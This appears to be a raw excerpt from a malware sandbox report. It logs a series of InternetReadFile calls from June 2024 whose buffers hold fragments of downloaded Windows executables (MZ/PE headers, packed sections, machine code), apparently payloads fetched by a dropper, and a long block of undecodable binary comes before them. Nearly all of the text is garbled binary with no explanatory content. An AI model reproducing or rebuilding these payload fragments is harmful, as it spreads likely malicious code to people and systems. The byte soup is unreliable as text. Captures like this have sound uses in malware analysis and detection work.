oî&¯zµ«·,ãh½Âf-#üä%ð_e9õÊ½[Jüj¦°pÔÅ¯åO?O®Ä$£äÄÓTÏ+¿z>Ôb&/ÆðSfgDÞ{\|ñÏã¡rèøn§ Ú¿ ídëII{p<_¬ éü`êL·¯spÐÛ\^³[ôëbXæÇoÔ¿ê,;Q§På%ômÜÁó¶ü-]è¦²bA°czvï Ü&oñu£#âm~]¦·ñU{¸`Æwü[éü+¡6á§wf@çÐ/¸«ÁµØ³r»GE¿\|5 +ÏGÅB\|z0Xì ÆÜìÚHs¿IroËb¹4´+þãÕÞ%K¶ÞSîë_ýÖnb2ï÷ÜZ87G"ðk/¼Rv£[¤OUFÒ-´aYý4ÙóÌÄTÙ[½® uáÎìHq¥ÒkM²vÑÍ?Ò·ÌfvÓíªÉ~`ïMÃÊ¬¢úøqvéO³`TYtêWêÐ§ÌØG]¡ÞÏ9LwT+zÉ/øÎQñÃ$`ÙI<d¨7ãÐ y¦<s bNüoc`«Q<HÌÓ,zv[HrNdÙ5×eîÔÆÖ,HPîvd(ÚÄÜÛ-Þñqq}£ÇøÃ1çÐË-ÍxÃÖ´ên,ÄC·D~&¥&æÑæÍ<8¡G8iø¯ÈUòÛ¨`²Oì.G-öµû³î±Äº6íMâuÓÿ¬ Û´ã?~ØãoÌy2luN;ôj7ÒÅ;ñâcüïH8`¦B;7ñ0ïíV\|² ifLÛ-}Ú¥%a@ 17¶åZ¡¸<RÅqíè¶åº3;@¡þÀ:'Éh4}C1V)"H$ý òoÍýÉHãúXÎËJ.bFfI#Ó´x÷´= !9pÞ¸hwjìôeìBi± ¾@ôÐóKkãü2jÅSQ! l63 mJÐ Õ}yNª¢rí?D/Î©BzPu½ê¼gytnÿæ&¬A¤Â³B_@ÎøÐ,º4Ë¾@ÒþeqAUbß¦Èýàýôp1Ao¿0©íÚ(h#ìðMóÃ«áLÌGïX ÆÀ@ÁÎ<zY6ÂQ{fÊà9ù8Í éCB03@Ø=¨¥¢:ém¹M«;l/] ME&/×ÜTRïµIåÆ¿Vf5ÿÊ¹1^^Ôª¡ÚÏõ}ÞÞp Jq~¥ª«A½²3\Â}FÉCëÏyñzÞjäÝåÝVjsöÍEÝ]×éU^Wõ0k]èº}ìa±='¿H ¢EÐ¬Y¹òÔÔâZ× »úÊXäfÈ;âÓÅkA+«JÒÊ1þëGy¾PLÇÁô]¿x×^.Ûa_¡CÞ-¼ðRÏêJí.§èy8Üo£Ã]zÔúòuÔÌº8]S 7jå¼,TFÈ2bC«ô5ÏÒæ³©±Ulí÷§ì&íF<úøêÆm°µHmêÌMuÿbJ LXsü69õ]-âKô§9Å+1Ïía$Âí¸A:IAëä=f0ïÓ¯4#ÚûH¦$ñÍÞåA0Ï½«äéÖÄËÃÿxWse_%ÌÖ6%«~þf¡ÇLÑÅ.e!Këy§1ß{i"AãrÎõ6@wÖÆA;"É·Î8Üiè#j5s,M>Ô_H8Åý^Y#¸£bGk{Ùz³Æ~¨7¦lì[·¨E:ÆÛAmWAjÈ±83=·ü(#å®ªEGºà®jã?6W@.ó8Z£ózE¢ÇÃ ?-ÎyJRnÀÿRæZf4`(-í×qYrtÛÒ]å[ý~ÇyýSÔå´ýçl«7)G¹aë?çÎd¿qô\Ë%Z.Òc«?ðíð[i^;ü(¾Çã`V®Ï¹^±M&QJxìï,ÍdþÔÍÛÐTÄ£$s³BY4ç:¨[³~$ÿÚjÅ¤õl¡Ñh[X\Â}l]Q¨û}/qa~]¶ýG¿á6#Û/¯·¦> ùmvfêrd:Ë°ò¿\|jUi S8ü Bö3 b8\ `»îpá%ÈÓÅûÊëÖóÃñ´À×E¶/[Ãÿ¯/ÿ{éµÞ%a~ñ¬¡uØ±bZÀíj %&£u"ÁMÛ2¢·SfùXry)À_æçØ0klBM3Æ3Ý_¦?lÉÑµ7xUQ&3ãéñÜýPxò%ysÎV¤9É±Â¾[}iQ÷+x1ãEnûÌQ~´Go\|exx÷:Dx5?éBÖ õö÷ôC ÆåL=Þß§HpÞ²££T}ösæ2Û¾ ÄØAAÎ¿Nâ;ÈIíþü \$äúÉK£üc»². ï_àÓ8l¶¼%'~'ÒEH´mê4úæ5GÞ!»}:gÜëíÄ²PP§³^Ø¥ 9¢:¬q%^ù´gS[o6 ±¯kÙyÞLkéÜêBCá4Úýåï\|ÊÜþ-@ JÜ}iiY°¸{pÂ©Ék0÷>ú®ezÐL0ýÇD(SÞº"S@9?¨EKÆ@®}GigTYYÐúØEr¦zÄe5wxC¯(ýë}V«Kçd request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:20 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÌPJr>r>r>Ó=r>Ó;(r>]:r>]=r>];ýr>Ó:r>Ó?r>r?^r>7r>Ár><r>Richr>PELÏ^fàäÆ@K@pKòD@X làì'K'K Ü@à.rsrcàì@À.idata î@À °°ð@àdeusfrzoÐ`1Êò@àngpoayha0K¼@à.taggant0@K"À@à request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $jä.øs·.øs·.øs·ep¶%øs·ev¶îøs·et¶/øs·ìy·øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·ew¶6øs·eu¶/øs·er¶5øs·.ør·ùs·Ýzz¶2øs·Ýz·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà'¼\|dSÐ@ S@8@IÔ`°(@I°8@IÀ< @àÐ@ @àPPB @à J @à À\ @à.rsrc`\ @àÐ/p` @à.dataThà @IØ ` @à Å¹ZÖowàBíÓ¿ IYÉ÷ã÷%ê2p(Ã2jRxõ½FÎ2õ×¶ºÁ<0¶sÿ ¾ £ Ø7ë5¡ðÎÀ\|Ì×dg¥¾¶°bÛ(èLFªñëQö zlYVßÑqèÏwïl®ßË(Ý<R£éRr¯ åÂT¡z7f£RÀ81ÛoHBEVDÞ°·øa^¤ÀR§'ùdÏ»ìÑZ9RÇ¾Aÿ¸ã´ñÒ«¸);úº?ØT ð#¢ÞRaé¡À.iÁÅ>_¯¼Y.cN5, ×cëF0æ¾´ ])f¸\|ñ¥&]]^ofÀF'v£ÄÿpsxóEª×,©÷¨DÂP Ù\"sOôÏ¾?Ö÷'¢óì½ìü¾MK4ÒmK«}.]&®V_4Íóz¹î?Á-OªÑ®©]%Émn=7ÏÕË¥-.ð¨Û0sÖy1¾ ºTmÏÇ_]éûì»32qLS» ÎxöááÚ¦ð8âTà)sY£KÐ VGøÝé¨¾L ëycLÊü§â¯$4¼pþbÆMùSnCO,ýÑ_2@× HÏýÍaSé8®¾8ñ§ÆÈt ©)å5Î!9ïÃ¸qÊ>A¨ë6k¡_Òh¿Þ9#)sßT)êW¨Ìu©ãñ _ÿ{Ô¬ Ô%ûQAßGßéùÝÓç~ü·<^øå+,¬1ß3 Án§ìJ}2#i1<.¦EïÈILÔ}&\|\|1ñpuI ÈNFùÕ{µ÷øì'Çªè0¬ ËfECç$¨;j¥ºTÉ¬ÑÌ9<(Ê;Zëv×ÜÑvÈ¶@²dÄ¡É¯W£µ:×m¨KpÒíêOmmS#>×e¸G'MÂ¥y1)È0Qÿ«{}Í'`$Cÿ 5In¾Vý³ÁÛo¾\;ÖPçtpæÀö:`¿\]ÈÊ3#9]³¿ !òG¡ÛÞåòóÈVCçÚ¦±ñ$§¼ÀJBQ(®·ÅW«.¯òÍâsXpÖ}°ïË}Ið@î,_å¤¶98ì\IYºL agÔ1ªîÎ[$ÊóFEðRi½KÃrYÝÇtÕ]{AuL¹Ö!¯?t÷ì·çd.á)?{éMS/!´/ëÅìÏ(¨Ñù[ 9oÙkÌñê{ß û%Ïq6k§îÔÊy_0±¸ìW¬L&m-SmîíhÖc#$w«EßÈ^Í\|âåÂç é!?È+GLÍ}{B çHú±ï¹D@ü?VÈíÄBR Ó¹+89+(²vXàR9»È×PpÐ"Ç¡«¡â=¨§·÷zñLT=Ý#\Þ¼ý!9É;@®þñík½ªBE½w&2¨?0Gºt/Ì[»üféË')BøÏ¡ÔWÝ ^¢Þ¸Ý¹iVé3Ì í{dEIfZ°dñ>×´×>7ÆÿVdER`´=Nå`Ö¼n'zä"ÓþRêã&íé\|ðvÐOò5+µØb ;F VVN ÇHÄfg¬ÝoÞ O¤¹JXÐù§Ô{g73 Ó©~J¼DéAâ[(bp&E}jÁeÉÑ_³X£²w2Ñý\íÛ"/.ITxÚÑÙlT×²ÛGJiÍ«TÜwPø¥+^÷If×@Ìª@ÃÓ9æ õÀ±dSfûTÎR,Y~'J±,[4eÀIp8¦ë ÝÓN`%p0²6¹ç}ëû¯4 #6×s¹Ìlv!cQr0æÓÂhÄ(à¶ºÞ/Ó×FÄqhh´Ärê~½ÅEÄYN©¤öGÞ`>ÀüràB+lx\|Ô¾`ÈRÑ9àáh]zmA² >µRÊ68ÜWyF¨M°\|¸UéÐ[×ÌwQÅq µrx^I¹ Ð-n¬ð^¥>âtþÀ=}ÝÀk Jß¡5Á x·&´Wuÿï9³ý3q>uW¾³Ý³òuPøÏËªèQ÷X@å2DÙè±>»lNE;þr4`PÂ¶t\Ãh»O¢dõÝc#0ñ±'C!¶>Ç7Z f6/¾Ù©.ë(«¬_¼tJîØjÚöÊÚöÀ-å¥OB@?bvÀFX²ÿ:Í±Ð#£cº"y]ÿUªSûV/õë««ìél,ã\|°ä7/¯OK,I% m@ ]¿ZðbÐÍÛ¬1ä¢q¼vÄUìÎ´¨$44¨Q=jMþÀÛGÎßµ´r¡ÕZL._º6IcÑGAÁ¡Rg-4É§l}ÔcÈÁ8ðÂ eXÌÀN{×¤¶ híÞRÜMÃ#MYBO¦/?ÅZt3üJTzæ¹þÂ\ÜL+Ço¬°ºYXþ/EE¼ûpr^?¸déÕN×5íÖìfã®l O{Õù¼pé,çòêìp½ÿ_í¥÷Ñx`6äx)[üzø$nÈ 3çkÝÇb>àÊCðS¤ÎùÇµn#Hc JéÂRë^W²¤ø³Ù¼ýlDXÓ¨ÿàô»bi¤Zä?jg¿=¿Ek¢îSñyÈNå·A_½íßÐp%È¬?G zÚ ¸J.õaÑîëìºÜÝ ½ÜðIµB!<"Yy]¼[æÒ³k¥Ï§ #é¼î1å¥+²d+,êC¡¯Ó4±¥¦0+mËK%£¼ð¼F=]Þ A·ktÝ';DuïÿS/fÅùñ¬Û¡+²8añB¡°ú Õè¥ø]=ðõÂ X+7ü4Ê<X!îIìÁvë¤¦>§¢¢H[¿+ôM=ÿÕu©vdµ2÷GWÛüÐáö^kx:áO1ÛÔ_¨?©ÕÞ9~¾aW";aæ¹²£Ä&lçÛz7²âÂ;L5ìJ Å#´ÝÈÍ+yA\|ô(05KÒú¿7±'))¬#qþ'ì#þn3L~Ü&Ñ.9Aë Å×pTüÄB¼Ú7ËZ[d^2³âßñÏº°zìH¾r©ÈI5hF[+Uó^àòÀ;³á«ëQ¦tîNäõîÙÑÛNë7'p)a^g¿õ8!ºG=}\|ý$îÑ¨èîÌØ¬Cft1ÿWöN''×ÌÔ7k5FòöiqW®.Öê0±kîB2æ©dkMA~¼V«ãÇÜâÚ}ECaÄB?JÉM·\|¦eÃÕæ âQá CÉòýBSÉÅ!òKs6¦àþÓÐr6Ã)À$ÛC¢ä¹?DuÊqàög¹ê¤Tþ)ñýáµºEå½©3;£e´Õ´§"`ÏÃèTæJÍö1/kèF xx×û(pRæ`î®,QózWâ.ÅIÄ1Ô<x À¸-í\¬¡`¬©.®uî(ùK¤7Á¤\_rÀîòHÆÃö%w>À_+1Æ»³ºC2?{D¥QTl ãÚ[óP¥aêfF´¥ØZì÷$àûÞêÝÈãç`M2Â½ÕG¡J`dnÚâ½]gZ¿A_[U/hØÉù 3«ÏeøêÍ~Þ]é½lu N´Y?=ÿeÉÛöÑjë6ÿ? >÷m] Î¡Oä request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPELô¹lfà"¬ wÀ @0\|@@@d\|@ \|a°uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc\|a@ bô@@.relocu°vV@B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè]N$èUÆ^ÃUìQSVWùûÿÿ@Ç8ûÿÿ\ÉIPûÿÿ:ûÿÿ\|üÿÿÀi3öVVVhHÉIÿÐÇI9·dýÿÿ[3ö9·4ýÿÿKËè®3ö9·Dýÿÿ3ö9·Týÿÿ·lýÿÿÎè÷º3ÉÇF@Ç9ûÿÿt5MüQMüQûÿÿè/ûÿÿ@ÈèÆ@Ç¸ûÿÿuÎÿlÈIOàÉkOÔÉu3Û_ÜOÄÉãO¤_Ìè`þÿÿè ·dþÿÿÎÇ<ÉIèÿvè¿èYýÿÿè\|ýÿÿè#lýÿÿè)º·\ýÿÿÎÇDÉIètÿvèèóÇLýÿÿ@ÉIY9Týÿÿòÿ·PýÿÿTýÿÿèXèóÇ<ýÿÿ@ÉIY9Dýÿÿñÿ·@ýÿÿDýÿÿè.èóÇ,ýÿÿ@ÉIY94ýÿÿðÿ·0ýÿÿ4ýÿÿèèY$ýÿÿÉù·ýÿÿÎÇ<ÉIè£ÿvèÚçYýÿÿÉãüüÿÿÉéèüÿÿè-ÐüÿÿèÄüÿÿÉÙÌüÿÿ¸üÿÿÉÙlüÿÿÀüÿÿèï\üÿÿèäLüÿÿèÙüÿÿèµ_^[ÉÃ`ýÿÿ°Àt#ÿ0ÿ5MÿÅI`ýÿÿ°ÉtQèØùÿÿF;·dýÿÿfýÿÿë¿qQèþàÎö þÿÿëëVñW3ÿN>è5N$è-N4èsPN`èkPèjÇ¼<ÉI¾À¾Ä¾ÈèiæY8Æ_^ÃVWùÉtQè_·¼ÎÇ<ÉIè6ÿvèmæYèÜO`è¯QO4è§QO$èÄO_^éºVñW3ÿ9~f_^ÃVñjVè×åYYÆ^ÂVñW3ÿ9~wf_^ÃFjÿ4¸è°åYYF$¸G;~sÝëâSVñ3ÛW¾d9u%\|èÿÿÿ¾p9u9=_^[ÃÏèÛëÎÏè=ëÚWùxÿÿÿ@Ç8xÿÿÿhÉIèhOðèóOàèëOÐèãOÀèÛO¬èÓOèËOèÃ\|ÿÿÿÉug_ÃVéË VWñè¶@öÉ _^ÃVqöÜ ^ÃWùu&?ÿu_ÃVw$Ïèij(WèäþYYöuæ^_ÃÿwèÓäYëÏVñÉtQèþÿÿìèP¼è&¬èèèN^éVWù3öD÷ÀN Fþ\|î_^ÃSVñ3ÛW8^ T 8^uNy8ÉtQè~^ ÿ_^[Ã³ëóVñN è²µÎè«µj@VèÐãYYÆ^ÂUìSÙVW{ {u)EÏ0è~µ7ÇGC{ _^[u Æ@]Â8ëÒ@8ëî3ÀÇMd3Éf£2MA¢4Mj 8M <M @M¢PMf£üM ôM øM¹úX M£DM£HM LMÃUìWù rVj@èãYÿuðÎèON8w^ÿ_]ÂUìVuWùVgèëåFO GFGFGF aPèÉåF0G0Ç_^]Â3Ò3À@AQQQQA,ÁQ Q(Q0ÃVñ&NèWèþèó¬èè¼èÝìè LjèEâÇ$\|ÉI ÿ ÇIFÆ^ÃjAZ @êuõÁÃSV5ÆI3ÛWùjXSGfÇG____j[ÇGÿÖSjG)ÿÖSh request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdÉOXfð.)®À«ö@Pý` Pì (¸©(@@ã(`S.text8¬®``.dataÀ²@À.rdataP+Ð,´@@.eh_framà@À.pdata( â@@.xdataø ì@@.bss0À.idataì Pö@À.CRT``@À.tlsp@À.rsrc(¸©º©@@.reloc@Â«@BUHåHMHULE DM(]ÃUHåHì èTöHÚÀt¹èÏ¨ë ¹èÃ¨è^ H7Ûè^ HÛè>2HgÙøuH)ÛHÁèK;¸HÄ ]ÃUHåHì0HÛwHÈÚHgHD$ AÑL@H1HÂH#HÁè7¨)HÄ0]ÃUHåHì0ÇEüÿH¤ÙÇè=EüEüHÄ0]ÃUHåHì0ÇEüÿHuÙÇèEüEüHÄ0]ÃUHåHìpHÇEðÇEä0EäeHHEØHEØH@HEèÇEüë!HEðH;Eèu ÇEüëE¹èHöBÿÐHMÙHEÐHEèHEÈHÇEÀHMÈHEÀHUÐðH± HEðH}ðu¨H&Ùøu¹è-§ë?HÙÀu(HÿØÇHBÙHÂH(ÙHÁè§ë ÇèHÍØøu&HïØHÂHÕØHÁèÝ¦H¦ØÇ}üuHØHE¸HÇE°HU°HE¸HH×HHÀtH×HA¸º¹ÿÐè8HÕØHÁH»AÿÐHØHHýÿÿHÁèèË/ HÁèsè),H[×HHñHH çHØÎIÈÁè ,ÖÔÀu ÆÁè+¦ÁÀuèÄ¥ªHÄp]ÃUHåHì H9×ÇH<×ÇH?×ÇH¢ÖHEøHEø·f=MZt ¸éHEø@<HcÐHEøHÐHEðHEð=PEt ¸éHEðHÀHEèHEè··À=t =t)ëVHEè@\øw¸ëHHEèÐÀÀ¶Àë4HEèHEàHEà@løw¸ëHEààÀÀ¶Àë¸HÄ ]ÃUSHìHHl$@M HU(E ÀHHÁàHÁè¥HEðHE(HHEèÇEüéEüHHÅHEèHÐHHÁè,¥HÀHÀHEàEüHHÅHEðHHEàHÁè°¤HEüHHÅHEèHÐHEüHHÅHEðHÈHHMàIÈHÁè¤EüEü;E eÿÿÿEüHHÅHEðHÐHÇHE(HUðHHÄH[]ÃUHåHì HMHEHÁè²£HÀt¸ë¸ÿÿÿÿHÄ ]ÃÃff.@1ÀÃff.fUWVSHì(Hl$ H5ºHñÿ>HÃHÀtkHñÿB>H=û=H÷¹HÙHÿ×Hú¹HÙHÆÿ×HÂ©HötHH ¯éÿÖH 6HÄ([^_]éÿÿÿfHYÿÿÿH5BÿÿÿH{©ë¼fUHåHì Ha©HÀt H UéÿÐH HÉtHÄ ]Hÿ%ó<HÄ ]Ãf.fDUWVSHºÅgV/ëÔ'IÊHI(EJHMBMIÉLÂIûIZIRH¿OëÔ'=®²ÂIB HÞH¯ßHÕHÑÂHÁÆH¯ïHòLÆHÁÆL¯ÇHòHÆHÁÅHÁÆH¯ÇHòIÁÀH¾Êë±y7H¯îL¯ÆH1êHÝH»c®²ÂwÊëH¯ÖHÁÅH¯îHÚH1êH¯ÖHÚI1ÐHÂL¯ÆHÁÂH¯ÖIH1ÂH¯ÖHÚIr0LÚI9ñr`H»OëÔ'=®²ÂHñI¸Êë±y7I»c®²ÂwÊëfDHAøHÁH¯ÃHÁÀI¯ÀH1ÐHÁÀI¯ÀJI9ÉsØLÈL)ÐHHÐHáøHñLAM9Ár5H¹Êë±y7H¯ÁLÁH1ÐHºOëÔ'=®²ÂHÁÀH¯ÂHºùy7±gVHÂL9És2IºÅgV/ëÔ'I¸Êë±y7¶HÁI¯ÂH1ÐHÁÀI¯ÀHÂI9ÉuâHÐHÁè!H1ÐHºOëÔ'=®²ÂH¯ÂHÂHÁêH1ÐHºùy7±gVH¯ÂHÂHÁê H1Ð[^_]ÃHì8LD$PLD$PLL$XLD$(è3=HÄ8Ãff.Hì8LL$XLL$XLL$(èx=HÄ8ÃAWAVAUATUWVSL\$hA;IÊIÔMÉ=C¶DÿIùv1HÇÂÿÿÿÿÀâ½Ð¸)ÐIù%KtøHë@HÉ¶A¶JcHÙÿá@A¶HHÁá0HÊA¶HHÁá(HÊA¶HHÁá HÊA¶HHÁáHÊA¶HHÁáHÊA¶HHÁáHÊÀQ½È¸ LÆD)ÈÁà)ÈÁïK,"MK@¶ÿMhLuýû÷Ûã?éÁfI9ð?ÂHñÁêAÓL)ÙL9ÁÁâHÎ)ÐHM9ò¬ÁIÓIÂIÓãÙIÓëKYD¶YD¶9AÃHÐEzüDÙHÓàÙHÓèIA¶¶@DØAJýIÓÁIÓãÙIÓëKYD¶YD¶9AÃHÐEzþDÙHÓàÙHÓèIA¶¶@DØAJÿø@w!L9î8ÿÿÿÂàÁêH)ÖHM9òUÿÿÿI9ês/÷ßç?ÁIÓIÂIÓãùIÓëOYA¶E¶[AJÿDØL9ÕuÖI9ðt4HÇÂìÿÿÿHÐ[^_]A\A]A^A_ÃHòL)ÂÑÁâH)Î)ÐHëI9êrLâø@uÄëÉfHÇÂ¸ÿÿÿHÐ[^_]A\A]A^A_ÃLÊë¤@AVAUATUWVSL\$`A3HÕMÉBC¶DÿIùv6HÇÂÿÿÿÿÀä½Ð¸)ÐIù(K\ request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¼yà0ÐÐÚ @ @OÔÉàl H.textÀÏ Ð `.rsrcÔÉÌÔ@@.relocà @B¼HPdtK´¸0 1s% ~Í%-&~Ìþ[s& %Í(+o( 8Ðo) £%rprYp~ (+ ¢%rqpr¯p~* (+ ¢%rÇprp~* (+ ¢%r!prap~* (+ ¢( o, 81(- sNsk~* }Ë~* s. (/ o0 }Ë{ËrqprÑp~* (+ o1 ,rãprp~* (+ +;rprap~* (+ o1 -{Ë(+{Ë((2 þ 9:o3 (4 o5 o6 (7 {Ë((2 þ 9ñs8 s8 s8 þOs9 ~Î%-&~Ìþ\s: %Î(+þPs9 ~Ï%-&~Ìþ]s: %Ï(+þQs9 ~Ð%-&~Ìþ^s: %Ð(+o; þ9E{Ë£%rip¢o< r}p(7 (A(+o> s? (L(+oRo@ #>@(A (B ioC &ÞÞ(D þ9þRs9 ~Ñ%-&~Ìþ_s: %Ñ(+þSs9 ~Ò%-&~Ìþ`s: %Ò(+þTs9 ~Ó%-&~Ìþas: %Ó(+ÞÞo]o_þUsE ~Ô%-&~ÌþbsF %Ô(+oaogþVsG ~Õ%-&~ÌþcsH %Õ(+ocþWsI ~Ö%-&~ÌþdsJ %Ö(+oeþXsK ~×%-&~ÌþesL %×(+oi( +,dsk%o]%r£p(7 o_%sN oa%og%oi%sO oc%sP oeoQ ( +,dsk%o]%rµp(7 o_%sN oa%og%oi%sO oc%sP oeoQ ÞÞojþ,oQ (R :ÃúÿÿÞþoS ÜoT :%úÿÿÞ,oS ÜÞ&Þ + Añ,:ÕåäÉµDù4â$0sp rËp(U (V þ , Ýî(srÝpo&8ooW ooW (rùpo1 ,4sp ¥%-oX om oo +sp%om%oo ÞÞXoþ:NÿÿÿÞ ÞÞÞ+ALPà1Ó 0sN ¥%Ð®(Y sZ (U (V þ , ÝS(s¥%Ðz(Y sZ o&8òsooW oooW oo(oÞÞÞoo(D - o+rýpoo(D - o+rýpoo(D - o+rýpoÜorýp([ ,o\ Xoþ :úþÿÿÞÞÞÞ+*AdzJÄzRÌoC8{}0Ìs8 (U (V þ , Ý£(s¥%Ð(Y sZ o&8Csq%ooW ot%ooW o3 .þov%ooW ox%oo3 1þoz%ooW (] @Bj[!¶Yo\|%ooW o~%r po(oo{jþ,-(^ (_ (` request_handle: 0x00cc000c	1	1
InternetReadFile June 15, 2024, 8:21 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $³Ù#÷q·p÷q·p÷q·p$´qüq·p$²q^q·p$³qâq·p$¶qôq·p÷q¶pq·p5ð³qåq·p5ð´qâq·p5ð²q£q·pó¾qöq·póµqöq·pRich÷q·pPELò\fà'8ªYsP@@Xê(Ø(&ð, Î`Í@PT.text/0 `.BSs³@4 `.rdata¢P¤<@@.dataèÚà@À.reloc,ðº@B¹pØ[èÕ=hJ?BèÿeYÃjjhÙ[¹@Ù[èChT?BèàeYÃVWjè©Y¿Ù[ðÏèFCjVÏÇÙ[8TBèìGh^?Bè¨eY_^Ã¹9Ù[éC¹8Ù[è\=hh?BèeYÃh\|?BèzeYÃhr?BèneYÃ¹ Ü[è.=h?BèXeYÃh?BèLeYÃÌÌÌÌÌÌÌ¸àç[ÃÌÌÌÌÌÌÌÌÌÌUìäøQVujèd¨ÄMQjVPèÎÿÿÿÿpÿ0è ÓÄ^å]ÃÌÌÌÌÌÌÌÌÌÌÌÌUìäøEPjÿuÿuÿuèÿÿÿÿpÿ0èvÓÉÿÄÀHÁå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌìD$WÀVñD$VÆD$RD$ÇÄRBPfÖèmmÄÆ^ÄÂÌÌÌÌÌÌVñWÀFPÇÄRBfÖD$ÀPè:mÄÆ^ÂÌÌÌÌÌÌI¸ôËBÉEÁÃÌÌVñFÇÄRBPèlmÄöD$tjVè¢aÄÆ^ÂÌÌÌAÇÄRBPè?mYÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇAÌBÇÜRBÃÌÌÌÌÌÌÌÌì$èÕÿÿÿhôéBD$Pè6mÌÌÌÌÌÌVñWÀFPÇÄRBfÖD$ÀPèjlÄÇÜRBÆ^ÂVñWÀFPÇÄRBfÖD$ÀPè:lÄÇÐRBÆ^Âh ÌBèC>ÌÌÌÌÌÌVñWÀFPÇÄRBfÖD$ÀPèúkÄÇèRBÆ^ÂD$T$HÂT$øìVÿt$RÿPt$HVI;Ju;u °^ÄÂ2À^ÄÂÌÌÌÌAVt$V;Bu;D$u°^Â2À^ÂÌÌÌÌÌÌÌÌÌÌÌÌD$L$Ç@¨Ó[ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìäðì¡@C3Ä$VuWÀWù)D$ ÇD$0Æ~ÇD$4t$@vD$@vþÿÿÿ-þw¹t$0L$4D$ ë[ÆÈ=ÿÿÿv¸ÿÿÿë ¹;ÁBÁD$D$PD$$Pèª8Èt$8D$D$<FPÿt$LL$0QèJoL$HÄt$0EUD$T$ötKÁ+Æør#FùD$0¹: D$ GD$ f0ÆD0ëjh0ÌBÆD$HL$(ÿt$Hjè6,T$ÿt$L$LQÊÿP\|$\T$HL$XGT$HD$4t$0+ÆL$QR;Èw*\|$<D$8D$(GD$(ðVènD$$ÄÆ0ëÆD$ ÿt$ QL$0è¿+L$\ùv-T$HAÂùrPüÁ#+ÂÀüø¿QRè"^Ä(L$ L$`ó~D$0fÖD$pWÀ\|$tf~ÈÇÄRBfÖGGÈ)L$`GL$PD$ÆD$ Pè)iL$\|ÄÇèRBùv)T$`AÂùrPüÁ#+ÂÀüøw>QRè]ÄMÇUO$ÇôRBW_^3Ìè2]å]ÂèüÿÿèÛèÛÌÌÌÌÌÌÌÌÌÌVñFÇÄRBPèühÄöD$tjVè2]ÄÆ^ÂÌÌÌVt$WÀWùGPÇÄRBfÖFPèYhÇôRBÄFNGÇOÇSB_^ÂÌÌÌÌÌÌÌÌÌÌÌÌVt$WÀWùGPÇÄRBfÖFPè hÄÇôRBFNGÇO_^ÂÌÌ¸4ÌBÃÌÌÌÌÌÌÌÌÌÌD$Vt$øu`D$ÇD$WÀPVÇFÇFè«5L$ÄÇFNÍB ,ÍBH 0ÍBHÆ@Æ^ÂWPèöPÐWÀÊÄÇFÇFyAÀuù+ÏQRÎèK#_Æ^ÂÌÌÌÌöD$VñtjVèÄ[ÄÆ^ÂÌÌÌÌÌWÀÁfÖAÇA@ÌBÇSBÃÌÌÌÌÌÌÌÌì$èÕÿÿÿhéBD$PèvgÌÌÌÌÌÌVñWÀFPÇÄRBfÖD$ÀPèªfÄÇSBÆ^ÂöD$VñÇSBtjVè.[ÄÆ^ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌVjñèr53ÀÇFfFFfF F$F(F,F0D$ÆFÇFÆFÇFÀtPVèNÄÆ^ÂhLÌBèk8ÌÌÌÌÌÌÌÌÌÌÌÌÌÌVñVè³NF,ÄÀt PèFÌÄÇF,F$Àt Pè/ÌÄÇF$FÀt PèÌÄÇFFÀt PèÌÄÇFFÀt PèêËÄÇFFÀt PèÓËÄÇFÎ^éÆ4ÌÌQVñ>u&jL$èX4>u 